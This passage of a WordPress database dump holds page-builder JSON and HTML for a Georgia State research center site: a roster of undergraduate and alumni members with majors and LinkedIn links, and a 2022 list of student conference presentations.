\/wp-content\\/uploads\\/2023\\/10\\/cropped-cropped-IMG_9249-e1697207848252.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1765,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c151\",\"index\":0,\"id\":\"182-c153\",\"partialId\":182,\"styleRef\":832,\"type\":\"content\",\"props\":{\"content\":\"MD Raiyan Haque<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c151\",\"index\":2,\"id\":\"182-c154\",\"partialId\":182,\"styleRef\":833,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"\\t 4:40 PM       https:\\/\\/www.linkedin.com\\/in\\/mdraiyanhaque\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c151\",\"index\":1,\"id\":\"182-c155\",\"partialId\":182,\"styleRef\":835,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":830,\"type\":\"content\"}],\"id\":\"182-c150\",\"parentId\":\"182-c149\",\"partialId\":182,\"styleRef\":829,\"type\":\"content\"}],\"id\":\"182-c149\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Undergraduates\"},\"id\":\"182-c158\",\"parentId\":\"182-c157\",\"partialId\":182,\"styleRef\":844,\"type\":\"content\"}],\"id\":\"182-c157\",\"parentId\":\"182-c156\",\"partialId\":182,\"styleRef\":843,\"type\":\"content\"}],\"id\":\"182-c156\",\"parentId\":\"182-c149\",\"partialId\":182,\"styleRef\":842,\"type\":\"content\"}]},\"styleRef\":828,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Alumni\",\"attrs\":{\"id\":\"alumni\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c161\",\"parentId\":\"182-c160\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c161\",\"index\":0,\"id\":\"182-c162\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-Sarah_Akinola-scaled-2-e1697208116294.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1772,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c161\",\"index\":0,\"id\":\"182-c163\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sarah Akinola\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c161\",\"index\":2,\"id\":\"182-c164\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/akinola-sarah-035789138\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c161\",\"index\":1,\"id\":\"182-c165\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c166\",\"parentId\":\"182-c160\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c166\",\"index\":0,\"id\":\"182-c167\",\"partialId\":182,\"styleRef\":918,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Anvith-e1697208489419.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1780,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c166\",\"index\":0,\"id\":\"182-c168\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Anvith Anand\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c166\",\"index\":2,\"id\":\"182-c169\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anvith-anand\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c166\",\"index\":1,\"id\":\"182-c170\",\"partialId\":182,\"styleRef\":919,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c171\",\"parentId\":\"182-c160\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c171\",\"index\":0,\"id\":\"182-c172\",\"partialId\":182,\"styleRef\":920,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-Alex-e1697208598736.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1782,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c171\",\"index\":0,\"id\":\"182-c173\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Alex Asige\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c171\",\"index\":2,\"id\":\"182-c174\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/twitter\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/twitter.com\\/i\\/flow\\/login?redirect_after_login=%2FAsigeAlex\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c171\",\"index\":1,\"id\":\"182-c175\",\"partialId\":182,\"styleRef\":921,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c176\",\"parentId\":\"182-c160\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c176\",\"index\":0,\"id\":\"182-c177\",\"partialId\":182,\"styleRef\":922,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Bhavya-scaled-1-e1697208670956.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1784,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c176\",\"index\":0,\"id\":\"182-c178\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Bhavya Busireddy\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c176\",\"index\":2,\"id\":\"182-c179\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/bhavya-busireddy-b052b192\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c176\",\"index\":1,\"id\":\"182-c180\",\"partialId\":182,\"styleRef\":923,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c181\",\"parentId\":\"182-c160\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c181\",\"index\":0,\"id\":\"182-c182\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Vineeth-e1697208720256.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1786,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c181\",\"index\":0,\"id\":\"182-c183\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Vineeth Kumar Chandha\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c181\",\"index\":2,\"id\":\"182-c184\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/vineeth-kumar-chandha-207611149\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c181\",\"index\":1,\"id\":\"182-c185\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c186\",\"parentId\":\"182-c160\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c186\",\"index\":0,\"id\":\"182-c187\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-cropped-cropped-sathwik-2-scaled-1-e1697208827396.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1788,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c186\",\"index\":0,\"id\":\"182-c188\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sathwik Chowda\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c186\",\"index\":2,\"id\":\"182-c189\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sathwikchowda\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c186\",\"index\":1,\"id\":\"182-c190\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c191\",\"parentId\":\"182-c160\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c191\",\"index\":0,\"id\":\"182-c192\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Brindal-e1697208968672.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1790,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c191\",\"index\":0,\"id\":\"182-c193\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Brindal Dhol\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c191\",\"index\":2,\"id\":\"182-c194\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/brindaldhol\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c191\",\"index\":1,\"id\":\"182-c195\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c196\",\"parentId\":\"182-c160\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c196\",\"index\":0,\"id\":\"182-c197\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-ruby_parcells-scaled-1-2-e1697209095569.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1792,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c196\",\"index\":0,\"id\":\"182-c198\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Ruby Parcells\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c196\",\"index\":2,\"id\":\"182-c199\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"},\"domuuid\":\"182-c259\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c200\",\"parentId\":\"182-c160\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c200\",\"index\":0,\"id\":\"182-c201\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Reshmanjali-1-e1697209179440.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1794,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c200\",\"index\":0,\"id\":\"182-c202\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sai Reshmanjali\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c200\",\"index\":2,\"id\":\"182-c203\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/reshmanjali-guntupalli\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c200\",\"index\":1,\"id\":\"182-c204\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c205\",\"parentId\":\"182-c160\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c205\",\"index\":0,\"id\":\"182-c206\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-cropped-cropped-Eliza-Schuh-e1697208271242.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1795,\"size\":\"\"},\"domuuid\":\"182-c161\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c205\",\"index\":0,\"id\":\"182-c207\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Eliza Schuh<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c205\",\"index\":2,\"id\":\"182-c208\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/search\\/results\\/all\\/?fetchDeterministicClustersOnly=true&heroEntityKey=urn%3Ali%3Afsd_profile%3AACoAACVdt3kBua3o83BdyteC4Ssk8shnCAvZZZc&keywords=eliza%20schuh&origin=RICH_QUERY_TYPEAHEAD_HISTORY&position=0&searchId=e7657352-5ea3-4501-b984-d21542771bc4&sid=WW)&spellCorrectionEnabled=true\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c205\",\"index\":1,\"id\":\"182-c209\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c210\",\"parentId\":\"182-c160\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c210\",\"index\":0,\"id\":\"182-c211\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Bronson-e1697209357897.png\",\"caption\":{\"text\":\"\"},\"imageId\":1797,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c210\",\"index\":0,\"id\":\"182-c212\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Bronson Tharpe\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c210\",\"index\":2,\"id\":\"182-c213\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/bronson-tharpe-9b754a1ba\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c210\",\"index\":1,\"id\":\"182-c214\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c215\",\"parentId\":\"182-c160\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c215\",\"index\":0,\"id\":\"182-c216\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-Angelique-e1697207062254.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1757,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c215\",\"index\":0,\"id\":\"182-c217\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Angelique Willis<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c215\",\"index\":2,\"id\":\"182-c218\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/angelique-willis\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c215\",\"index\":1,\"id\":\"182-c219\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c220\",\"parentId\":\"182-c160\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c220\",\"index\":0,\"id\":\"182-c221\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-e1697207627160.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1763,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c220\",\"index\":0,\"id\":\"182-c222\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Joshua Quiroz\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c220\",\"index\":2,\"id\":\"182-c223\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/joshua-quiroz-315713215\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c220\",\"index\":1,\"id\":\"182-c224\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"}],\"id\":\"182-c160\",\"parentId\":\"182-c159\",\"partialId\":182,\"styleRef\":911,\"type\":\"content\"}],\"id\":\"182-c159\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Alumni\"},\"id\":\"182-c227\",\"parentId\":\"182-c226\",\"partialId\":182,\"styleRef\":926,\"type\":\"content\"}],\"id\":\"182-c226\",\"parentId\":\"182-c225\",\"partialId\":182,\"styleRef\":925,\"type\":\"content\"}],\"id\":\"182-c225\",\"parentId\":\"182-c159\",\"partialId\":182,\"styleRef\":924,\"type\":\"content\"}]},\"styleRef\":910,\"type\":\"content\"}],\"id\":\"182-c1\",\"partialId\":182,\"styleRef\":407,\"type\":\"content\"}','','','publish','closed','closed','','562','','','2024-11-14 09:48:38','2024-11-14 14:48:38','',0,'https://gsudice.dataconn.net/?post_type=extb_post_json&#038;p=562',0,'extb_post_json','',0),(570,1,'2022-03-17 21:15:02','2022-03-18 01:15:02','{\"name\":\"hop-content\",\"id\":\"449-c1\",\"partialId\":449,\"styleRef\":368,\"type\":\"content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Custom\",\"attrs\":{\"id\":\"custom\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"id\":\"449-c4\",\"parentId\":\"449-c3\",\"partialId\":449,\"children\":[{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"449-c4\",\"index\":0,\"id\":\"449-c5\",\"partialId\":449,\"styleRef\":380,\"type\":\"content\",\"props\":{\"content\":\"<p><strong>2022<\\/strong><\\/p><p>Parcells, R. 2022. Aedes Mosquito Early Warning System: Challenges Integrating Public Health Surveillance Data. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.<\\/p><p>Schuh, E. 2022.&nbsp;Building a resilient energy grid: development of an urban-scale model for energy prediction.&nbsp;Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.<\\/p><p>Anand, A. 2022.&nbsp;Aedes Mosquito Early Warning System: Integrating Disparate Environmental Datasets.&nbsp;Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.<\\/p><p>Garland, R. 2022.&nbsp;GSU (Georgia State University) Contact Networks and Interventions.&nbsp;Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.<\\/p><p>McDaniel, Emma L; Henry Phan; Puneet Singh; Chetan Tiwari; and Armin R Mikler. 2022. Evaluating Potential Exposure Risk to Gastrointestinal Disease-Causing Specimens after Documented Wastewater Spills in Atlanta. Poster presented at: American Association of Geographers, Annual Meeting 2022.<\\/p><p><br><\\/p><p><br><\\/p><p><br><\\/p><p><br><\\/p><p><br><\\/p>\"}}],\"styleRef\":379,\"type\":\"content\"}],\"id\":\"449-c3\",\"parentId\":\"449-c2\",\"partialId\":449,\"styleRef\":378,\"type\":\"content\"}],\"id\":\"449-c2\",\"parentId\":\"449-c1\",\"partialId\":449,\"styleRef\":377,\"type\":\"content\"}]}','','','inherit','closed','closed','','497-revision-v1','','','2022-03-17 21:15:02','2022-03-18 01:15:02','',497,'https://gsudice.dataconn.net/?p=570',0,'revision','',0),(571,1,'2022-03-17 21:15:02','2022-03-18 01:15:02','<div data-colibri-id=\"449-c1\" class=\"style-368 style-local-449-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"449-c2\" id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-377 style-local-449-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"449-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-378 style-local-449-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-379-outer style-local-449-c4-outer\">\n            <div data-colibri-id=\"449-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-379 style-local-449-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"449-c5\" class=\"h-text h-text-component style-380 style-local-449-c5 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><strong>2022</strong></p>\n                    <p>Parcells, R. 2022. Aedes Mosquito Early Warning System: Challenges Integrating Public Health Surveillance Data. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.</p>\n                    <p>Schuh, E. 2022.&nbsp;Building a resilient energy grid: development of an urban-scale model for energy prediction.&nbsp;Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.</p>\n                    <p>Anand, A. 2022.&nbsp;Aedes Mosquito Early Warning System: Integrating Disparate Environmental Datasets.&nbsp;Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.</p>\n                    <p>Garland, R. 2022.&nbsp;GSU (Georgia State University) Contact Networks and Interventions.&nbsp;Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.</p>\n                    <p>McDaniel, Emma L; Henry Phan; Puneet Singh; Chetan Tiwari; and Armin R Mikler. 2022. Evaluating Potential Exposure Risk to Gastrointestinal Disease-Causing Specimens after Documented Wastewater Spills in Atlanta. Poster presented at:\n                      American Association of Geographers, Annual Meeting 2022.</p>\n                    <p>\n                      <br>\n                    </p>\n                    <p>\n                      <br>\n                    </p>\n                    <p>\n                      <br>\n                    </p>\n                    <p>\n                      <br>\n                    </p>\n                    <p>\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Presentations','','inherit','closed','closed','','449-revision-v1','','','2022-03-17 21:15:02','2022-03-18 01:15:02','',449,'https://gsudice.dataconn.net/?p=571',0,'revision','',0),(578,1,'2022-03-18 20:38:07','2022-03-19 00:38:07','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About\",\"attrs\":{\"id\":\"about\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c4\",\"parentId\":\"122-c3\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"122-c4\",\"index\":0,\"id\":\"122-c5\",\"partialId\":122,\"styleRef\":288,\"type\":\"content\",\"props\":{\"content\":\"Who are we?\"}},{\"name\":\"hop-heading\",\"parentId\":\"122-c4\",\"index\":1,\"id\":\"122-c6\",\"partialId\":122,\"styleRef\":289,\"type\":\"content\",\"props\":{\"content\":\"The Center for Disaster 